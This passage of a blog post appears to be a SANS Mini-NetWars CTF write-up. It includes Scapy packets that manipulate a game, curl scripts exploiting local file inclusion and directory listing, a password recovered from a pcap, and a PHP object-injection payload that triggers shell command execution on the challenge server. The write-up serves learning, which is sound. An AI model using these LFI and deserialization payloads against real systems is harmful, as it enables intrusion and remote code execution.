&gt; &gt; &gt; sr1(IP(dst="127.0.0.1")/UDP(sport=6000, dport=53)/DNS(qr=1,qd=DNSQR(qname="difficulty.local"), an=DNSRR(rrname="difficulty.local", rdata="0")))
&gt; &gt; &gt; Begin emission:
&gt; &gt; &gt; Finished sending 1 packets.
&gt; &gt; &gt; .(Change Difficulty) Instruction ID 8892931792975189 Executed
</code></pre></div></div>

<h2 id="win-pawng">Win Pawng!</h2>

<p>Use the packets above in the source code after copying it into a new file. If you set the difficulty to 0 you’ll just win really quick. The win screen says</p>

<p><code class="language-plaintext highlighter-rouge">Prolific Ping Pawng Pwner</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def set_difficulty(GAME_DIFFICULTY="100"):
    send(IP(dst="127.0.0.1")/UDP(sport=6000, dport=53)/DNS(qr=1,qd=DNSQR(qname="difficulty.local"), an=DNSRR(rrname="difficulty.local", rdata="0")), iface="lo", verbose=False)

def paddle_up():
    send(IP(dst="127.0.20.180")/TCP(dport=20,flags="PA")/Raw(load="up"), iface="lo", verbose=False)

def paddle_down():
    send(IP(dst="127.80.1.46")/ICMP(type="echo-reply")/Raw(load="down"), iface="lo", verbose=False)
</code></pre></div></div>

<h1 id="elf-invaders">Elf Invaders</h1>

<p>https://www.bram.us/2020/04/08/how-to-enable-http3-in-chrome-firefox-safari/ Enable HTTP3 in firefox</p>

<h2 id="find-the-version-number-of-the-cabinet-once-you-see-the-game-eg-8675309">Find the version number of the Cabinet once you see the game. (e.g. 8.675309)</h2>

<p>In the source of the main HTML file is</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;meta name="description" content="Elf Invaders Version 1.61434327095534551" /&gt;
</code></pre></div></div>

<h2 id="what-is-the-message-when-you-score-over-9500-eg-thats-over-9500">What is the message when you score over 9500? (e.g. That’s over 9500!)</h2>

<p>In the hitbox detection function, set <code class="language-plaintext highlighter-rouge">player.score = 10000</code> and then let it resume execution. You eventually make a request to the API that results in a response<br>
with <code class="language-plaintext highlighter-rouge">Score Level Over 9000!</code></p>

<hr>

<blockquote>
  <p><strong>Disclosure</strong>: I did not complete the challenges below. The following notes are from another player that shared the notes with me.</p>
</blockquote>

<h2 id="whats-the-date-in-apiphp">What’s the date in api.php?</h2>

<p><code class="language-plaintext highlighter-rouge">5/1/2019</code></p>

<p>It looks like there’s an api request with a file. Use the curl version on the elf debug terminal since it has http3 support. Create a script, <code class="language-plaintext highlighter-rouge">lfi.sh</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
curl --silent --http3 'https://elf-invaders.elfu.org/api.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw "conf=${1}" | sed -n 's/.*"data":"//p' | sed -n 's/"}//p'
echo ''
</code></pre></div></div>

<p>We can then use the script to grab stuff</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>../config/config.json returns a file
../../www/config/config.json
./lfi.sh "../../../var/www/config/config.json" works but /var/www/config/config.json doesn't work
../lfi.sh ../html/api.php
</code></pre></div></div>

<p>in api.php</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;?php
  // Made By Alabaster Snowball on 5/1/2019
  function get_db() {
    $dbname = '/var/www/db/elfinvaders.sqlite';
    if (file_exists($dbname) &amp;&amp; filesize($dbname) &gt; 500000) {
      unlink($dbname);
    }
</code></pre></div></div>

<h2 id="find-the-name-of-the-debug-pcap-on-the-web-server">Find the name of the debug PCAP on the web server.</h2>

<p>Looking in api.php, we can do directory listings too with <code class="language-plaintext highlighter-rouge">list=</code> as the payload. Create <code class="language-plaintext highlighter-rouge">dir.sh</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
curl --silent --http3 'https://elf-invaders.elfu.org/api.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw "list=${1}"
echo ''
</code></pre></div></div>

<p>We can use this to list files and find there’s a file <code class="language-plaintext highlighter-rouge">adminlogin_debug.pcap</code>.</p>

<h2 id="find-alabasters-password-eg-directreindeerflatterystable">Find Alabaster’s password. (e.g. DirectReindeerFlatteryStable)</h2>

<p>Grabbing the <code class="language-plaintext highlighter-rouge">adminlogin_debug.client_random</code> and using it in wireshark to decrypt the QUIC in the pcap we find some payloads:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@Ç(ÍðôÒ¹~îåÚ6¡GREASE is the word,ÔQ`rRj®zÿ×P¢\.®Ã_P%¶PÃ«¸úàZþ?ÝTqÿï@Eusername=alabaster_snowball&amp;password=4084072e86e12aabef9ace3e39145ba3
</code></pre></div></div>

<p>Entering <code class="language-plaintext highlighter-rouge">4084072e86e12aabef9ace3e39145ba3</code> as the flag works.</p>

<h2 id="update-the-cabinets-firmware-and-retrieve-the-new-version-number">Update the cabinet’s firmware and retrieve the new version number.</h2>

<p>People left files sitting around so I found this without doing what’s intended, just the LFI and directory listing, but I did most of the object injection anyways.</p>

<p>2.11516925085506347</p>

<p>get_auth_cookie.sh</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
curl -v --http3 'https://elf-invaders.elfu.org/admin.php' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw "username=alabaster_snowball&amp;password=4084072e86e12aabef9ace3e39145ba3" 2&gt;&amp;1 | grep "set-cookie" | sed -E "s/.*elfinv=([a-zA-Z0-9._-]+);.*/\1/"
</code></pre></div></div>

<p>php for generating the object injection</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;?php
  class OldAdminMethod
  {
    // Will remove this later after testing more secure new admin class
    public $command;
    public $logname;

    function __construct($cmd="", $log='/var/www/db/cmdhist.log')
    {
      $this-&gt;command = $cmd;
      $this-&gt;logname = $log;
    }

    public function readlog() {
      if (file_exists($this-&gt;logname) &amp;&amp; is_readable($this-&gt;logname)) {
        return preg_replace( '/[^[:print:]\r\n\t]/', '', file_get_contents($this-&gt;logname));
      }
    }

    function __destruct()
    {
      $stdout = shell_exec($this-&gt;command);
      if (strlen($stdout)) {
        if (is_writable(dirname($this-&gt;logname))) {
          file_put_contents($this-&gt;logname, "{$this-&gt;command}\n$stdout");
        }
      }
    }
  }

$file = '/var/www/db/cmdhist.log';
$oldAdminMethod = new OldAdminMethod('/usr/bin/firmwareupdate', $file);
echo "'" . serialize($oldAdminMethod) . "'";
echo "\n";
</code></pre></div></div>

<p>generates</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'O:14:"OldAdminMethod":2:{s:7:"command";s:2:"ls";s:7:"logname";s:23:"/var/www/db/cmdhist.log";}'
</code></pre></div></div>

<p>Then we can use the cookie and the above to generate a request to admin.php to do command injection via the object injection. When instantiating the class<br>
the constructor and then the destructor will be called.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl -v --http3 'https://elf-invaders.elfu.org/admin.php' -H "Cookie:
elfinv=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWxhYmFzdGVyX3Nub3diYWxsIiwiZXhwaXJlcyI6MTU4OTY3Mjc3NiwiZXhwIjozMTc5MjU5MTUyfQ.fwQJ4c-jpMHxG7_H_4uT82368Xb9DnE1LhhE0HcX03k" -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw 'method=read_file&amp;arguments=O:14:"OldAdminMethod":2:{s:7:"command";s:23:"/usr/bin/firmwareupdate";s:7:"logname";s:23:"/var/www/db/cmdhist.log";}'
</code></pre></div></div>

<p>Then we should be able to use LFI to get the log.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>elfuser@bdd5e02ba86f:~\$ ./lfi.sh ../db/cmdhist.log | xxd -r -p
/usr/bin/firmwareupdate
Firmware Updated - Elf Invader Version 2.11516925085506347
</code></pre></div></div>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/tags/#ctf" class="page__taxonomy-item p-category" rel="tag">ctf</a><span class="sep">, </span>
    
      <a href="/tags/#cybersecurity" class="page__taxonomy-item p-category" rel="tag">cybersecurity</a><span class="sep">, </span>
    
      <a href="/tags/#netwars" class="page__taxonomy-item p-category" rel="tag">netwars</a><span class="sep">, </span>
    
      <a href="/tags/#sans" class="page__taxonomy-item p-category" rel="tag">sans</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      <a href="/categories/#ctf" class="page__taxonomy-item p-category" rel="tag">CTF</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time class="dt-published" datetime="2020-05-20T10:19:45-05:00">May 20, 2020</time></p>

      </footer>

      <section class="page__share">
  <h4 class="page__share-title">Share on</h4>

  <a href="https://x.com/intent/tweet?text=Mini-NetWars+%26%238211%3B+Mission+3+%28May+2020%29%20http%3A%2F%2Flocalhost%3A4000%2F2020%2F05%2Fmini-netwars-mission-3-may-2020%2F" class="btn btn--x" aria-label="Share on X" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on X">
    <i class="fab fa-fw fa-x-twitter" aria-hidden="true"></i><span> X</span>
  </a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Flocalhost%3A4000%2F2020%2F05%2Fmini-netwars-mission-3-may-2020%2F" class="btn btn--facebook" aria-label="Share on Facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook">
    <i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span>
  </a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=http://localhost:4000/2020/05/mini-netwars-mission-3-may-2020/" class="btn btn--linkedin" aria-label="Share on LinkedIn" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn">
    <i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span>
  </a>

  <a href="https://bsky.app/intent/compose?text=Mini-NetWars+%26%238211%3B+Mission+3+%28May+2020%29%20http%3A%2F%2Flocalhost%3A4000%2F2020%2F05%2Fmini-netwars-mission-3-may-2020%2F" class="btn btn--bluesky" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Bluesky">
    <i class="fab fa-fw fa-bluesky" aria-hidden="true"></i><span> Bluesky</span>
  </a>
</section>


      
  <nav class="pagination">
    
      <a href="/2020/02/pfsense-and-verizon-fios/" class="pagination--pager" title="pfSense and Verizon FiOS">Previous</a>
    
    
      <a href="/2020/10/pentesting-resources-and-links/" class="pagination--pager" title="Pentesting Resources and Links">Next</a>
    
  </nav>


    </div>

    
  </article>

  
  
    
<div class="page__related">
  
  <h2 class="page__related-title">You May Also Enjoy</h2>
  <div class="grid__wrapper">
    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2025/11/VA-Disability-Calculator-App-Update-1.26.0/" rel="permalink">VA Compensation Calculator iOS App — Update 1.26.0
</a>
      
    </h2>
    <span style="font-size: 14px;">November 06, 2025</span>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          less than 1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">I’ve released an updated version of my VA Disability Calculator iOS app (version 1.26.0).

</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2025/05/VA-Disability-Calculator-App-Release/" rel="permalink">VA Compensation Calculator iOS App Released!
</a>
      
    </h2>
    <span style="font-size: 14px;">May 19, 2025</span>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          less than 1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">I’ve released my first iOS application: VA Compensation Calculator, a privacy-focused tool designed to help veterans calculate VA disability ratings and esti...</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2024/05/Cloud-Security-Engineer-Resources/" rel="permalink">Cloud Security Engineer Resources
</a>
      
    </h2>
    <span style="font-size: 14px;">May 30, 2024</span>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Cloud Security Engineer Resources

</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2024/02/Transitioning-from-WordPress-to-Jekyll-on-GitHub-Pages/" rel="permalink">Transitioning from WordPress to Jekyll on GitHub Pages
</a>
      
    </h2>
    <span style="font-size: 14px;">February 09, 2024</span>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">I recently embarked on a tech journey, moving my blog from WordPress hosted on a Digital Ocean droplet to using Jekyll on GitHub Pages. This wasn’t just a le...</p>
  </article>
</div>

    
  </div>
</div>

  
  
</div>

      
    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap">
<form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term...">
  </form>
  <div id="results" class="results"></div>
</div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="page__footer-disclaimer">
  <p>
    <strong>Disclaimer:</strong>
    The views and opinions expressed on this website and associated platforms are solely my own
    and do not represent those of my employer. References to products, tools, or services are for
    informational purposes only and do not constitute endorsement.
  </p>
</div>
      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>






  </body>
</html>
